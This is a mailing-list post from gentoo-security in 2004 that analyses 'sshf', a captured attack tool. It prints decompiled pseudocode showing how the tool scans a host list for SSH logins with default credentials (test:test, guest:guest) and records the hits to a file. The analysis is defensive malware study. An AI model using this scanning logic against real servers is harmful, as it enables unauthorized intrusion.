1 |
Le Thu, 29 Jul 2004 15:29:23 -0700, Alex Schultz <aschultz@××××××××.com> a |
2 |
écrit: |
3 |
|
4 |
> I'm not 100% sure, but after a quick look it appears that sshf opens up |
5 |
> the uniq.txt and then procedes to connect to every ip using test:test or |
6 |
> guest:guest. It then dumps out which of those accounts:ip worked to |
7 |
> vuln.txt. Then a person can just go through the vuln.txt and ssh and |
8 |
> perform whatever rooting they so choose. |
9 |
> |
10 |
> I wonder what the "ss" program does. It's got libpcap compiled into it |
11 |
> so maybe it's some sort of sniffer and/or ip generator (creates |
12 |
> bios.txt?). |
13 |
> |
14 |
> Br0mGreV wrote: |
15 |
> |
16 |
>> Hi, |
17 |
>> |
18 |
>> Does anyone started to reverse-ingineer that damn soft 'sshf'? I'm sure |
19 |
>> we can learn some information about the exploit, if we |
20 |
>> look at this file. |
21 |
>> I'll start that tommorow. Hope to give you some informations from that |
22 |
>> soon. |
23 |
>> |
24 |
>> GD |
25 |
>> |
26 |
>> -- gentoo-security@g.o mailing list |
27 |
>> |
28 |
>> |
29 |
> |
30 |
> |
31 |
> -- |
32 |
> gentoo-security@g.o mailing list |
33 |
|
34 |
> |
35 |
|
36 |
|
37 |
OK from what i've seen in that prog, it's quite straight forward, i copy |
38 |
here a long |
39 |
description of what happend, i'm not sure it's really important, but we'll |
40 |
see : |
41 |
First, the software is linked statically, of course. |
42 |
We can found this 4 revelant strings : |
43 |
"SSH-2.0-libssh-0.1" |
44 |
"**MD5 or whatever** part of openSSL 0.9.d 17 Mar 2004" |
45 |
"inflate 1.1.4 Copyright 1995-2002 Mark Adler" |
46 |
|
47 |
|
48 |
main() { |
49 |
file=fopen("uniq.txt","r"); |
50 |
if (file==NULL){ printf(("nu pot deschide uniq.txt\n"); exit();} |
51 |
|
52 |
Global_loop: |
53 |
fgets (C,0x400,file) |
54 |
if (C==0) return(); |
55 |
if ((end_of_l=strch (C,0xA))!=NULL) // linefeed |
56 |
*(end_of_l)=0; // is substituted by endofstring |
57 |
Process=fork(); |
58 |
**** |
59 |
if (end_of_l!=NULL) { |
60 |
ccheckauth(C,"test","test"); |
61 |
ccheckauth(C,"guest","guest"); |
62 |
} else { |
63 |
if(*(nb_proc++)<='2') goto Global_loop; |
64 |
while(*(nb_proc)>'2') { wait(Process)}; |
65 |
nb_proc--; |
66 |
goto Global_loop; |
67 |
} |
68 |
} |
69 |
exit(); |
70 |
} |
71 |
|
72 |
|
73 |
and the ccheckauth(host,login,passwd) { |
74 |
alarm(0xF); |
75 |
options=ssh_getopt(1,"none"); |
76 |
options_set_username(options,login); |
77 |
option_set_host(options,host) |
78 |
|
79 |
if((connection=ssh_connect(options))==NULL) return; |
80 |
if(ssh_userauth_password(connection,0,passwd)==0) { |
81 |
fopen(vuln.txt,"a+"); |
82 |
fprintf("%s:%s:%s\n",host,login,passwd); |
83 |
printf("GOT IT !! -> %s:%s:%s\n",host,login,passwd); |
84 |
} else (ssh_disconnect(connection)); |
85 |
return; |
86 |
} |
87 |
|
88 |
|
89 |
I assume this program is definitely a not-that-intelligent attack against |
90 |
SSH servers, as explained before. |
91 |
for all the address in uniq.txt, it test for the stupid login |
92 |
"test"-"test" and "guest"-"guest" |
93 |
and, that's all. |
94 |
|
95 |
Don't see anything else. I maybe check ssh functions later, but not sure |
96 |
it's necessary. |
97 |
If the system is weak enough to include that kind of login, it's possible |
98 |
that the root passwd is empty-or-easy-to-guess, and that's explain the |
99 |
attack is leaded from root account. |
100 |
Another hypothesis is the first compromised computer wasn't exploited that |
101 |
way. |
102 |
And when he performs that first attack, he doesn't find any SSH server to |
103 |
exploit and abord. |
104 |
|
105 |
Have a good night && sweet dreams if needed, it's late there in France ;) |
106 |
|
107 |
|
108 |
-- |
109 |
gentoo-security@g.o mailing list |